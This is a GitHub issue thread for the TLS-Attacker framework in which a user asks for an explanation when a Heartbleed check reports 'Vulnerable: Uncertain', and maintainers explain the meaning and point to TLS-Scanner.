search

tls-attacker / TLS-Attacker

TLS-Attacker is a Java-based framework for analyzing TLS libraries. It can be used to manually test TLS clients and servers or as as a software library for more advanced tools.
Apache License 2.0
789 stars 136 forks source link

Vulnerable: Uncertain should offer more explanationabout the Why #90

Closed florianrein closed 2 years ago

florianrein commented 3 years ago

Hello tls-attacker team, in a recent evaluation run, we got the following result for a heartbleed check as the last line in the log file:

Vulnerable: Uncertain

The remaining log file did not contain any hints about why it could not be determined, whether the server is affected. We ran the experiment with debug logs on, but still no hints on the uncertainty. This left us a little... uncertain..., how to handle the case. :-)

tls-attacker should print a few explanatory sentences, about why it could not be determined, whether the target server is affected or not, after printing the result as seen above.

ic0ns commented 3 years ago

Hey, for the heartbleed vulnerability, uncertain means that TLS-Attacker wasn't even able to finish the handshake with the server and send the heartbeat messages to test for heartbleed. But you are correct, we should add a sentence or two explaining the situation.

ic0ns commented 2 years ago

We moved the heartbleed scans (and in fact all scans) to TLS-Scanner (https://github.com/tls-attacker/TLS-Scanner), where we have more fine grained control over the response from the test. Our next version (TLS-Scanner 4.3.0) can completely explain itself. Sadly this feature didn't make it into 4.2.0. Closing this here